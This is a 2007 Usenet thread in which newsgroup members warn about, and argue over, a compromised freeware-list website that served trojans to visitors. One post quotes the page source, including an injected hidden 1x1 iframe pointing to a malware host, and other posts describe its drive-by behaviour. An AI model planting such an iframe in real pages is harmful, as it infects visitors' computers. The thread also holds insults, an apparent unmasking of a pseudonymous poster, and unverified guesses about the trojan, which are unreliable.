Ping Susan -Pricelessware site
Mahatma Kote
--
Happy as a fat rat in a cheese factory
Mike Easter
> What's happened ? - can't get in.
http://www.pricelesswarehome.org/ works OK for me
http://www.pricelessware.org/ gives me a lot of virus alerts.
--
Mike Easter
Bear Bottoms
Mahatma Kote
wrote:
OK got it. I still had http://www.pricelessware.org/ in bookmarks.
John Corliss
Virus alerts? Mike, can you elaborate on that a little?
http://www.siteadvisor.com/sites/pricelessware.org
--
John Corliss BS206. I try not to reply to trolls like Andy Mabbett,
Hummingbird or proteanthread.
Because of Googlespam, I use NFilter to block all Google Groups
posts from being displayed in my news reader.
No ad, cd, commercial, cripple, demo, dotnet, nag, share, spy,
time-limited, trial or web wares OR warez for me, please.
hummingbird
On Tue, 30 Oct 2007 05:55:24 -0500 'hm...@hmmm.org'
wrote this on alt.comp.freeware:
>"Mike Easter" <Mi...@ster.invalid> wrote in
>news:13ictrn...@corp.supernews.com:
>
>> http://www.pricelessware.org/ gives me a lot of virus alerts.
>
>What AV program are you using? I just opened it and didn't get anything,
>and I've gone to that site using several of the top AV programs in the last
>year. Adblock plus doesn't show any strange items and Siteadvisor.com
>gives it a clean rating./
>
>One thing I did notice this time is that even with javascript enabled, I
>couldn't get a menu on the pricelessware.org main page. All I saw was the
>banner.
The pricelessware.org website is infect with this:
http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
See the warning thread I posted about it...
--
uh oh...black helicopter ... gotta run
hummingbird
On Tue, 30 Oct 2007 09:28:31 -0500 'hm...@hmmm.org'
wrote this on alt.comp.freeware:
>hummingbird <hummi...@2die4.com> wrote in
>news:8dd15d7fd9d9b666...@localhost.127.0.0.1:
>
>> The pricelessware.org website is infect with this:
>> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.h
>> tml
>>
>> See the warning thread I posted about it.
>I didn't see anything on the Prevx page that mentioned pricelessware.org.
>I also tried a Google newsgroup search for your thread and couldn't find
>it.
The prevx page doesn't mention pricelessware.org ... it describes
the trojan that the website is infected with. I got that by googling
one of the .exe files which were downloaded from the
pricelessware.org site onto my computer.
Here's what I wrote in a new thread MID:
Message-ID: <b734e4829ce58928...@localhost.127.0.0.1>
<quote>
-----WARNING-----WARNING-----
It appears the OLD Pricelessware website has been compromised
and infected with a trojan virus.
IF YOU SURF TO IT, IT WILL AUTO DOWNLOAD A BUNCH OF
TROJANS/VIRUS EXECUTABLEs AND MAY INFECT YOUR COMPUTER.
Details of the trojan virus and what it does are here:
>http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
</quote>
HTH.
Franklin
> hummingbird <hummi...@2die4.com> wrote in
> news:8dd15d7fd9d9b666...@localhost.127.0.0.1:
>
>> The pricelessware.org website is infect with this:
>> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.E
>> XE.h tml
>>
>> See the warning thread I posted about it.
>
> I didn't see anything on the Prevx page that mentioned
> pricelessware.org. I also tried a Google newsgroup search for your
> thread and couldn't find it.
>
Your scans couldn't find anything.
Maybe Hummingbird picked up the virus while visiting porn sites?
bluerhinoceros
Curiosity not being confined to cats, I had to have a go at it shortly
after HB first posted his alert. My scanner also blocked some Java
activity. I saw a reference to "gollum" go by, and a bunch of other
redirections, and some Java junk got trapped before I canned it.
After doing a full system cleanse, I put pricelessware.org into my
Untrusted Sites list and went back. Nothing happened then.
And I don't think it's got anything to do with pron sites, the only
horny babe I've been looking at recently is this one:
http://www.positivt.dk/images27/0060.jpg
Cheers.
Franklin
> Franklin wrote:
>>
>> Your scans couldn't find anything.
>>
>> Maybe Hummingbird picked up the virus while visiting porn sites?
>
> Curiosity not being confined to cats, I had to have a go at it
> shortly after HB first posted his alert. My scanner also blocked
> some Java activity. I saw a reference to "gollum" go by, and a
> bunch of other redirections, and some Java junk got trapped before
> I canned it.
>
> After doing a full system cleanse, I put pricelessware.org into my
> Untrusted Sites list and went back. Nothing happened then.
>
> And I don't think it's got anything to do with pron sites, the only
> horny babe I've been looking at recently is this one:
>
> http://www.positivt.dk/images27/0060.jpg
Don't show that picture to Hummingbird! It will only give him ideas.
hummingbird
On Tue, 30 Oct 2007 10:04:09 -0700 'bluerhinoceros'
wrote this on alt.comp.freeware:
>Curiosity not being confined to cats, I had to have a go at it shortly
>after HB first posted his alert. My scanner also blocked some Java
>activity. I saw a reference to "gollum" go by, and a bunch of other
>redirections, and some Java junk got trapped before I canned it.
Wow! you're braver than me bluerhino! I only went there to check
if it was working after someone posted that it wasn't working.
>After doing a full system cleanse, I put pricelessware.org into my
>Untrusted Sites list and went back. Nothing happened then.
I've now put it in my hosts file...never again.
I must say I'm rather puzzled as to why anyone would select that
website to hack into and plant a complex trojan...hhmmm.
Anyway, I e-mailed the website hosters and reported it.
>And I don't think it's got anything to do with pron sites, the only
>horny babe I've been looking at recently is this one:
>
>http://www.positivt.dk/images27/0060.jpg
:-)
Susan Bugher
> Curiosity not being confined to cats, I had to have a go at it shortly
> after HB first posted his alert. My scanner also blocked some Java
> activity. I saw a reference to "gollum" go by, and a bunch of other
> redirections, and some Java junk got trapped before I canned it.
>
> After doing a full system cleanse, I put pricelessware.org into my
> Untrusted Sites list and went back. Nothing happened then.
Also curious, I looked at the page source - copied below.
****************************************
<html><head><meta name="robots" content="index, follow"><meta
name="revisit" content="7 days"><link rel="shortcut icon"
href="favicon.ico"><meta http-equiv="content-type" content="text/html;
charset=UTF-8"><title>Pricelessware</title></head><body
bgcolor="#A3BEC9" text="#000000" link="#0000FF" vlink="#0000FF"
alink="#FF0000" marginheight="0" marginwidth="0" topmargin="0"
bottommargin="0" leftmargin="0" rightmargin="0"><table border="0"
cellpadding="0" width="100%" height="100%"><tr><td width="100%"
align="center" valign="middle"><table border="0" cellpadding="0"
width="400" bgcolor="#000000"><tr><td width="100%" bgcolor="#FFFFFF"
align="center" valign="top"><table border="0" width="100%" height="100%"
bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"><tr><td width="100%"
valign="top" align="left" bgcolor="#FFFFFF"> <br><center><font
face="Verdana,Arial" color="#000080"
SIZE="4">alt.comp.freeware</font><br><FONT face="Arial" COLOR="#000000"
SIZE="2"><b>Is proud to present to you...</b></font><br> <br><hr
width="300" size="1" noshade><font face="Verdana,Arial" color="#0963A0"
SIZE="5">The Pricelessware list!</font><hr width="300" size="1"
noshade> <br><font face="Verdana,Arial" SIZE="2"><b>[ <a
href="thelist/index.htm">E n t e r H e r e</a>
]</b><br> <br></center></td></tr></table></td></tr></table></td></tr></table><iframe
src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230" width=1
height=1 frameborder=0>
</body></html>TH ALIGN=center BGCOLOR="#FFFF00"><FONT
SIZE="-1">Visits</FONT></TH>
<TH ALIGN=center BGCOLOR="#FF8000"><FONT SIZE="-1">Sites</FONT></TH>
<TH ALIGN=center BGCOLOR="#FF0000"><FONT SIZE="-1">KBytes</FONT></TH>
<TH ALIGN=center BGCOLOR="#FFFF00"><FONT SIZE="-1">Visits</FONT></TH>
<TH ALIGN=center BGCOLOR="#00E0FF"><FONT SIZE="-1">Pages</FONT></TH>
<TH ALIGN=center BGCOLOR="#0080FF"><FONT SIZE="-1">Files</FONT></TH>
<TH ALIGN=center BGCOLOR="#008040"><FONT SIZE="-1">Hits</FONT></TH></TR>
<TR><TH HEIGHT=4></TH></TR>
<TR><TD NOWRAP><A HREF="usage_200709.html"><FONT SIZE="-1">Sep
2007</FONT></A></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">1</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">587</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD></TR>
<TR><TH HEIGHT=4></TH></TR>
<TR><TH BGCOLOR="#C0C0C0" COLSPAN=6 ALIGN=left><FONT
SIZE="-1">Totals</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">587</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">0</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">0</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">2</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">2</FONT></TH></TR>
<TR><TH HEIGHT=4></TH></TR>
</TABLE>
</CENTER>
<P>
<HR>
<TABLE WIDTH="100%" CELLPADDING=0 CELLSPACING=0 BORDER=0>
<TR>
<TD ALIGN=left VALIGN=top>
<SMALL>Generated by
<A HREF="http://www.mrunix.net/webalizer/"><STRONG>Webalizer Version
2.01</STRONG></A>
</SMALL>
</TD>
</TR>
</TABLE>
<!-- Webalizer Version 2.01-10 (Mod: 16-Apr-2002) -->
</BODY>
</HTML>
<iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
width=1 height=1 frameborder=0>
***************************
The original page and page source can be viewed via the Wayback Machine
(the WM adds some javascript to the source, ignore that part). See:
http://web.archive.org/web/*/http://www.pricelessware.org/
dunno what:
<iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
width=1 height=1 frameborder=0>
does but I don't think it's good.
Susan
--
Posted to alt.comp.freeware
Search alt.comp.freeware (or read it online):
http://www.google.com/advanced_group_search?q=+group:alt.comp.freeware
Pricelessware & ACF: http://www.pricelesswarehome.org
Pricelessware: http://www.pricelessware.org (not maintained)
hummingbird
On Tue, 30 Oct 2007 14:03:54 -0400 'Susan Bugher'
wrote this on alt.comp.freeware:
>Also curious, I looked at the page source - copied below.
[snip]
>dunno what:
>
><iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>width=1 height=1 frameborder=0>
>
>does but I don't think it's good.
That website is hosted in Malaysia it seems and is owned by a
registrant in Hong Kong, China:
http://www.dnsstuff.com/tools/whois.ch?ip=http://xstuff.biz/
hummingbird
On Tue, 30 Oct 2007 14:03:54 -0400 'Susan Bugher'
wrote this on alt.comp.freeware:
>--
>Posted to alt.comp.freeware
>Search alt.comp.freeware (or read it online):
>http://www.google.com/advanced_group_search?q=+group:alt.comp.freeware
>Pricelessware & ACF: http://www.pricelesswarehome.org
>Pricelessware: http://www[dot]pricelessware[dot]org (not maintained)
Susan, do you think it's a good idea still to be advertising the
OLD pricelessware site in your signature, given that it's been
hacked and contains a trojan virus?
bluerhinoceros
>> Details of the trojan virus and what it does are here:
>>> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.h
>>> tml
>
> into the search for files and folders, so that I can search for all of the
> files listed in one try. I seem to remember that a semicolon or some
> other punctuation mark.
>
>
> Shouldn't this kind of info about Pricelessware.org be discussed on
> Wilders? What good is Siteadvisor if they don't have an alert. Is there
> anyone at McAfee who evens monitors that tool?
Hi hmmm:
Go to the bottom of the page where it says "...can also use the
following file names".
Select them all (hold down the left mouse button and starting at the top
left of the first file name, go to the end of the last name). LEt up the
left button, right click the selection, select Copy.
Open Notepad, and paste in what you just copied. Make sure your cursor
is at the very beginning of the text and click Edit -> Replace. Replace
a single space with a comma followed by a space. Look for the string
"DOCUMENTS, AND, SETTIN" and remove the two commas from it, but surround
it with the double quotes so it looks exactly (quotes included) like
"DOCUMENTS AND SETTIN"
Select all text and right click -> Copy.
Open a command line. Change directories to the root of the drive,
typically C:\
Type "dir " (no quotes, but remember the space). Click the top left
black box icon in the title bar, move to Edit, select Paste.
If there's a trailing comma, bacspace over it, add a space and "/s" (no
quotes).
Hit enter.
You might also like to run it after adding " /a:h" and then " /a:s" at
the end of the command line, also. (No quotes, but a leading space)
If you get toms of hits, repeat the command but add ">> c:\found.jnk" at
the end of the line. When you're finished, c:\found.jnk will contain
reference to all the files found.
<gasp>
Hope this makes sense, and it works for you.
Cheers.
bluerhinoceros
> bluerhinoceros <bluerhi...@humanzoo.invalid> wrote in
> news:13iep0d...@news.supernews.com:
>
>> My scanner also blocked some Java
>> activity. I saw a reference to "gollum" go by, and a bunch of other
>> redirections, and some Java junk got trapped before I canned it.
>>
>> After doing a full system cleanse, I put pricelessware.org into my
>> Untrusted Sites list and went back. Nothing happened then.
>>
>
> filled that they're have to start injecting Comet Cleanser and Lysol into
> the security programs soon.
Hi hmmm:
I'm using Avira Antivir Personal Edition Classic. I also use Prevx 2.0,
but it didn't notice anything, presumably because AntiVir was earlier in
the food chain.
I then used Avira to scan the whole drive, followed by a reboot, another
sweep and a going over with Prevx, Spybot and AdAware for good measure.
I have Returnil installed, and had I thought about it, I'd have turned
on sandbox mode before going to a known nasty site, but it was late and
I was tired... :-)
Cheers.
Lew/+Silat
<hm...@hmmm.org> wrote in message news:wbKdndRP-Pt9Abra...@giganews.com...
>> activity. I saw a reference to "gollum" go by, and a bunch of other
>> redirections, and some Java junk got trapped before I canned it.
>>
>> After doing a full system cleanse, I put pricelessware.org into my
>> Untrusted Sites list and went back. Nothing happened then.
>>
>
> filled that they're have to start injecting Comet Cleanser and Lysol into
> the security programs soon.
If you surf using the free "Returnil" or "sandboxie" none of this would bother your machine:)
--
Lew/+Silat
hummingbird
On Tue, 30 Oct 2007 16:02:12 -0500 'hm...@hmmm.org'
wrote this on alt.comp.freeware:
>hummingbird <hummi...@2die4.com> wrote in
>news:08381e20fde3bbc3...@localhost.127.0.0.1:
>
>> Details of the trojan virus and what it does are here:
>>>http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.h
>>>tml
>>
>
>What's the easiest way to copy all of the files listed on the Prevx url
>into the search for files and folders, so that I can search for all of the
>files listed in one try. I seem to remember that a semicolon or some
>other punctuation mark.
Do you mean do a search on your local machine?
If so, I dunno because I use my payware file manager and it listed
the bad files in about 5 secs because I have files sorted by date in
descending order, so the trojan .exe files all appeared at the top
of the list and I immediately saw them there. That allowed me to
rename them all, reboot and search for other items like the reg key
it created and then run a few av apps.
Notably, Spybot S&D found nothing even with the latest updates
running and AdAware only found the bad reg key.
I guess it took me about 1 hour and three reboots to recover.
No damage done. I caught it in good time.
Today, I put all the bad files through jotti but only about 40%
of their virus scans found the trojans in them, notably Kaspersky
and F-whatsit. I am not impressed :-(
>Shouldn't this kind of info about Pricelessware.org be discussed on
>Wilders? What good is Siteadvisor if they don't have an alert. Is there
>anyone at McAfee who evens monitors that tool?
Dunno, I posted the alert to warn other ACF-ers and possibly that
someone might know how to deal with it. I also sent urgent e-mail
to the website hoster today - so far no response. It needs taking
down and fixing pronto.
Anonymous Sender
>
> On Tue, 30 Oct 2007 05:55:24 -0500 'hm...@hmmm.org'
> wrote this on alt.comp.freeware:
>
> >"Mike Easter" <Mi...@ster.invalid> wrote in
> >news:13ictrn...@corp.supernews.com:
> >
> >> http://www.pricelessware.org/ gives me a lot of virus alerts.
> >
> >What AV program are you using? I just opened it and didn't get
> >anything, and I've gone to that site using several of the top AV
> >programs in the last year. Adblock plus doesn't show any strange
> >items and Siteadvisor.com gives it a clean rating./
> >
> >One thing I did notice this time is that even with javascript
> >enabled, I couldn't get a menu on the pricelessware.org main page.
> >All I saw was the banner.
>
> The pricelessware.org website is infect with this:
> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
No, it's not. It links to about a hundres other sites behind your back
and one of them may or may not try to send you that file (I saw no such
thing in a full packet capture), but it's not "infected" with anything.
>
> See the warning thread I posted about it...
>
Innacurate warnings from people who don't know what they're talking
about are as useless as no warnings at all. Next time you run up
against something you don't understand, please don't just guess. Ask
politely and an expert will explain it to you.
HTH.
hummingbird
On Wed, 31 Oct 2007 00:48:54 +0000 (UTC) 'Anonymous Sender'
wrote this on alt.comp.freeware:
>hummingbird wrote:
>
>>
>> On Tue, 30 Oct 2007 05:55:24 -0500 'hm...@hmmm.org'
>> wrote this on alt.comp.freeware:
>>
>> >"Mike Easter" <Mi...@ster.invalid> wrote in
>> >news:13ictrn...@corp.supernews.com:
>> >
>> >> http://www.pricelessware.org/ gives me a lot of virus alerts.
>> >
>> >What AV program are you using? I just opened it and didn't get
>> >anything, and I've gone to that site using several of the top AV
>> >programs in the last year. Adblock plus doesn't show any strange
>> >items and Siteadvisor.com gives it a clean rating./
>> >
>> >One thing I did notice this time is that even with javascript
>> >enabled, I couldn't get a menu on the pricelessware.org main page.
>> >All I saw was the banner.
>>
>> The pricelessware.org website is infect with this:
>> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
>No, it's not.
Yes it is. I got caught with it last night.
I Googled some of the files and that's what it came up with.
And your next trick.............. is..............?
>It links to about a hundres other sites behind your back
>and one of them may or may not try to send you that file (I saw no such
>thing in a full packet capture), but it's not "infected" with anything.
Wrong. Do try to keep up at the back.
If you read elsewhere in this thread, you will see that someone
grabbed a raw copy of the front page from the pl.org site and it
contains a website address (unrelated to pricelessware.org) which is
hosted in Malaysia. That is probably where users are having the
trojan files downloaded from without knowing. So there appears to
be only one redirection but I'm not too fussed about it. That is
consistent with what happened to my ISP 6 months ago when Russian
criminals hacked into their webmail service and diverted users to
*their* website address to download trojans.
>> See the warning thread I posted about it...
>>
>
>Innacurate warnings from people who don't know what they're talking
>about are as useless as no warnings at all. Next time you run up
>against something you don't understand, please don't just guess. Ask
>politely and an expert will explain it to you.
It won't be you then, will it.
hummingbird
On Tue, 30 Oct 2007 15:59:45 -0700 'bluerhinoceros'
wrote this on alt.comp.freeware:
>Hi hmmm:
>
>I'm using Avira Antivir Personal Edition Classic. I also use Prevx 2.0,
>but it didn't notice anything, presumably because AntiVir was earlier in
>the food chain.
>
>I then used Avira to scan the whole drive, followed by a reboot, another
>sweep and a going over with Prevx, Spybot and AdAware for good measure.
See my comments about Spybot and AdAware. Neither picked up the
trojan files on my HDD.
>I have Returnil installed, and had I thought about it, I'd have turned
>on sandbox mode before going to a known nasty site, but it was late and
>I was tired... :-)
Stop chasing rhinos ;-)
Susan Bugher
> bluerhinoceros wrote:
>> Curiosity not being confined to cats, I had to have a go at it shortly
>> after HB first posted his alert. My scanner also blocked some Java
>> activity. I saw a reference to "gollum" go by, and a bunch of other
>> redirections, and some Java junk got trapped before I canned it.
>>
>> After doing a full system cleanse, I put pricelessware.org into my
>> Untrusted Sites list and went back. Nothing happened then.
> Also curious, I looked at the page source - copied below.
<SNIP>
Sometimes paranoid, I went to the web page Hummingbird posted:
http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
where they recommended I scan my computer with:
Prevx Computer Security Investigator (CSI)
http://pxnow.prevx.com/zeroL/PREVXCSIFREE.EXE
1523 KB
so I did. . . the results:
<q>
Security Product AVG 7.5.485 Version 7.5.485
Windows Windows XP Home Service Pack 2 (Build 2600) 32bit
Scans 1 (First Scan: Oct 31 4:13 UCT Last Scan: Oct 31 4:17 UCT)
Files Checked 2,780
Bad Files 0
Your Computer Status CLEAN
</q>
> dunno what:
>
> <iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
> width=1 height=1 frameborder=0>
>
> does but I don't think it's good.
still dunno what that link does. . .
Nomen Nescio
Yes, dimbulb, that's exactly what I said.
And the site isn't infected with anything, even if it does try to drop
files. You apparently don't even understand the basic lexicography, let
alone the problem in any depth.
> That is probably where users are having the
> trojan files downloaded from without knowing. So there appears to
> be only one redirection but I'm not too fussed about it. That is
More like 60. I counted 66 to be exact, and snaked them all. There's a
whole lot more to be concerned with than amateurish .exe link exploits
on that page. So whoever "grabbed the front page" needs to learn a
little bit more about what they're doing too.
> consistent with what happened to my ISP 6 months ago when Russian
> criminals hacked into their webmail service and diverted users to
> *their* website address to download trojans.
That's UPload. And sites offering trojans for download aren't
"infected" no matter where they are or how many they offer.
>
>
> >> See the warning thread I posted about it...
> >>
> >
> >Innacurate warnings from people who don't know what they're talking
> >about are as useless as no warnings at all. Next time you run up
> >against something you don't understand, please don't just guess. Ask
> >politely and an expert will explain it to you.
>
> It won't be you then, will it.
Seems to be working well so far this time. If you weren't so thick this
conversation would already be over. But I have to keep correcting you
and going over the same material. :(
>
bluerhinoceros
> and I use Firefox with the Adblock Plus extension. I also use the free
> anti-spyware programs you mentioned above, plus A-squared, Super
> Antispyware, and AVG Anti-spyware (all free versions) less Prevx.
>
> I didn't get any alerts , however. It seems that I used to get more site
> alerts when I had Avast installed, and I have Antivirs heuristics set to
> high. I also used to have Winpatrol installed plus a few others. I
> might install Spyware Terminator soon. Do you prefer Returnil over
> Sandboxie?
>
> Has anyone actually experienced any problems relating to
> Pricelessware.org?
>
It's all over now, somebody fixed something either there or at that
iframe URL. For what it's worth, a Google cached page from Oct 28 shows
different data being passed to that php script than now, commented out.
Cheers.
Anonymous
>
> On Tue, 30 Oct 2007 15:59:45 -0700 'bluerhinoceros'
> wrote this on alt.comp.freeware:
>
>
> >Hi hmmm:
> >
> >I'm using Avira Antivir Personal Edition Classic. I also use Prevx
> >2.0, but it didn't notice anything, presumably because AntiVir was
> >earlier in the food chain.
> >
> >I then used Avira to scan the whole drive, followed by a reboot,
> >another sweep and a going over with Prevx, Spybot and AdAware for
> >good measure.
>
> See my comments about Spybot and AdAware. Neither picked up the
> trojan files on my HDD.
Neither one of them SHOULD.
REM
> Susan Bugher <sebu...@yahoo.com> wrote:
>> dunno what:
>> <iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>> width=1 height=1 frameborder=0>
>> does but I don't think it's good.
I just tried it using FF with NoScript and JavaView extensions. It's
blank now. It looks to be some sort of a free web page place here
someone setup malware shop.
hummingbird
On Tue, 30 Oct 2007 23:53:38 -0500 'hm...@hmmm.org'
wrote this on alt.comp.freeware:
>hummingbird <hummi...@2die4.com> wrote in
>news:3f49b1c52cd83d7c...@localhost.127.0.0.1:
>
>> See my comments about Spybot and AdAware. Neither picked up the
>> trojan files on my HDD.
>>
>Were all of these relating to Pricelessware.org?
>This answers my question in the previous post. What AV program and
>firewall are you using?
Yes, the files were those downloaded through the pricelessware.org
trojan. Neither SpyBot nor AdAware picked them up when I scanned
the system.
I use old payware v4.5.594 of ZoneAlarm but *no* AV program
at all.
hummingbird
On Wed, 31 Oct 2007 08:05:22 +0100 (CET) 'Anonymous'
wrote this on alt.comp.freeware:
>hummingbird wrote:
>
>>
>> On Tue, 30 Oct 2007 15:59:45 -0700 'bluerhinoceros'
>> wrote this on alt.comp.freeware:
>>
>>
>> >Hi hmmm:
>> >
>> >I'm using Avira Antivir Personal Edition Classic. I also use Prevx
>> >2.0, but it didn't notice anything, presumably because AntiVir was
>> >earlier in the food chain.
>> >
>> >I then used Avira to scan the whole drive, followed by a reboot,
>> >another sweep and a going over with Prevx, Spybot and AdAware for
>> >good measure.
>>
>> See my comments about Spybot and AdAware. Neither picked up the
>> trojan files on my HDD.
>
>Neither one of them SHOULD.
Are you going to say why?
hummingbird
On Tue, 30 Oct 2007 23:51:45 -0500 'hm...@yhmmm.org'
wrote this on alt.comp.freeware:
>bluerhinoceros <bluerhi...@humanzoo.invalid> wrote in
>news:13ifdr4...@news.supernews.com:
>I have Avira Antivir PE Premium (free three month trial) with a firewall,
>and I use Firefox with the Adblock Plus extension. I also use the free
>anti-spyware programs you mentioned above, plus A-squared, Super
>Antispyware, and AVG Anti-spyware (all free versions) less Prevx.
FWIW when I uploaded the trojan files to jotti yesterday, A-squared
failed miserably at identifying them as trojans. Kaspersky and
F-whatsit were best and picked them all up. Many others failed too.
Also yesterday, SUPERantispyware latest sigfile picked up 4 of the 8
files as trojans.
>I didn't get any alerts , however. It seems that I used to get more site
>alerts when I had Avast installed, and I have Antivirs heuristics set to
>high. I also used to have Winpatrol installed plus a few others. I
>might install Spyware Terminator soon. Do you prefer Returnil over
>Sandboxie?
>
>Has anyone actually experienced any problems relating to
>Pricelessware.org?
Me and presumably anybody else who surfed to the website while the
trojan was active, bluerhino says it may have been sorted now but...
hummingbird
On Wed, 31 Oct 2007 06:41:24 +0100 (CET) 'Nomen Nescio'
wrote this on alt.comp.freeware:
Who are you? Anonymous or Nomen Nescio? Lol.
Oh really? You could have fooled me. I just checked and can't
find those words posted by anyone using Anonymous or Nomen Nescio.
So I'm not sure what your point is ... if you have one.
>And the site isn't infected with anything, even if it does try to drop
>files. You apparently don't even understand the basic lexicography, let
>alone the problem in any depth.
Wrong ... but I think I've had enough of this silly banter with a
one or more k00ks who post using different anon names every time.
How about growing up and getting a life?
EOT for me.
bye bye.
HAND.
ps - if you have some useful information about how the
pricelessware.org trojan scam was set up and how it operates,
I'm sure we'd like to know, so post a new thread about it. thx.
Franklin
wrote:
Why should adware scanners find trojans?
Franklin
>
> On Wed, 31 Oct 2007 06:41:24 +0100 (CET) 'Nomen Nescio'
>>> On 31 Oct 2007 'Anonymous Sender' wrote this:
>>> >hummingbird wrote:
>>> >> On 30 Oct 2007 'hm...@hmmm.org' wrote:
One could ask why do you, Chris Millbank, call yourself Hummingbird?
What are you trying to hide?
And why do you need to use "XNA=yes"?
Naaybe you have made many enemies in the past and they want to even
up with you.
>
> Oh really? You could have fooled me. I just checked and can't
> find those words posted by anyone using Anonymous or Nomen Nescio.
> So I'm not sure what your point is ... if you have one.
>
Hunmmingbird, you are a champion of the wacko argument. Now here is
someone who is not buying your k00ky loopiness.
>>And the site isn't infected with anything, even if it does try to
>>drop files. You apparently don't even understand the basic
>>lexicography, let alone the problem in any depth.
>
> Wrong ... but I think I've had enough of this silly banter with a
> one or more k00ks who post using different anon names every time.
Hummingbird, don't forget that you loike to post under any different
names and you even engage in conversations with your sockpuppets.
> How about growing up and getting a life?
> EOT for me. bye bye. HAND.
>
> ps - if you have some useful information about how the
> pricelessware.org trojan scam was set up and how it operates,
> I'm sure we'd like to know, so post a new thread about it. thx.
--
Some of Hummingbird's methods are explained here:
http://www.searchlores.org/way_kook.htm
elaich
news:b659f56ea6a54777...@dizum.com:
> Yes, dimbulb, that's exactly what I said.
Why are you using an anonymous remailer based in Italy to post to this
group? Something to hide?
--
A: Because it disturbs the logical flow of the message.
Q: Why is top posting frowned upon?
hummingbird
On Wed, 31 Oct 2007 10:05:41 -0500 'hm...@hmmm.org'
wrote this on alt.comp.freeware:
>hummingbird <hummi...@2die4.com> wrote in
>news:fc2e709b7a0da3d4...@localhost.127.0.0.1:
>
>> I use old payware v4.5.594 of ZoneAlarm but *no* AV program
>> at all.
>>
>Don't you think a program like Avira Antivir or Avast with its many shields
>might have blocked the trojans? Why are you allowing your computer to ride
>"bareback" and not practice safe hex?
I have never run any AV s/w in 12 yrs, and it's debatable as to
how good many of them are and they mostly impose a substantial
overhead on system resources etc.
Also bear in mind that when I ran the trojan files through jotti
yesterday, only about 40% of the 20-22 virus scans picked up
anything at all. That is bad bad bad (not jottis fault of course).
SpyBot picked up nothing and SUPERantispyware picked up 4 out
of 8 files, both using the latest sigfiles.
As for safe hex ... I *do* avoid all websites which I think are
or might be suspect but it is still a small risk as this incident
reveals. Who's have thought that a relatively small website like
pricelessware.org would somehow be hacked? if it was hacked
and wasn't the owners themselves...
As they say, the situation is under review! ;-)
hummingbird
On Wed, 31 Oct 2007 15:06:34 +0000 'Cheemag'
wrote this on alt.comp.freeware:
>On Wed, 31 Oct 2007 12:45:28 +0000, hummingbird <hummi...@2die4.com>
>wrote:
>
>>Also yesterday, SUPERantispyware latest sigfile picked up 4 of the 8
>>files as trojans.
>
> How do you manage to make an anti-spyware application
>find trojans?
Good point. I dunno. I give up. What SAS actually found were 4 of
the files which it said were fake 'svchost' files. In fact there was
only one of them (filename: _svchost.exe) and the other 3 were
obviously related to it. But it missed the other 4 files.
(of course I'd already identified and disabled all of them myself)
btw - my use of the term trojan in these threads is taken from
the link I posted which calls this crapware: Trojan.SystemPoser.
My hunch is that it tries to install a keylogger onto your system
and sends data and browser images back to its mothership ...
presumably with your bank/credit card details etc .. but I have
no conclusive evidence of that.
hummingbird
On Wed, 31 Oct 2007 13:21:09 +0000 (UTC) 'Aaron'
wrote this on alt.comp.freeware:
>hm...@yhmmm.org wrote in
>news:ItidnfIfsM18lLXa...@giganews.com:
>
>
>> Has anyone actually experienced any problems relating to
>> Pricelessware.org?
>
>Even if the site was hacked and an iframe was added to a "evil" site, it
>does not automatically mean you will be infected. My guess is the majority
>of alt.comp.freeware people are fully patched and I highly doubt that
>"hack" was using a zero day exploit so it probably didn't hurt anyone.
If you look at the cut/paste Susan posted of the website front page,
it does show a very suspicious iframe in with a pointer to a website
hosted in Malaysia. If you know about these things, you might like
to comment...
-Lost
<snip>
>> dunno what:
>>
>> <iframe
>> src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>> width=1 height=1 frameborder=0>
>>
>> does but I don't think it's good.
>
> still dunno what that link does. . .
I do not believe that was the exact link when I visited, but it was
the xstuff.biz site (I believe the ?out=nnnn was different). Anyway,
it loads up some encoded JavaScript, the JavaScript attempts a few
other things, tries to load Java applets from the "golom" site, and
eventually if that fails or not it redirects you to Google.
I initially thought it redirected if it could not infect, but I
forgot to disable one of my security measures. It redirects upon
infection or not.
It weakly tries to infect your system. Only Internet Explorer is
currently susceptible and only in the least secure of environments.
Also, that link is currently dead...
--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
-Lost
>>> Has anyone actually experienced any problems relating to
>>> Pricelessware.org?
>>
>>Even if the site was hacked and an iframe was added to a "evil"
>>site, it does not automatically mean you will be infected. My
>>guess is the majority of alt.comp.freeware people are fully
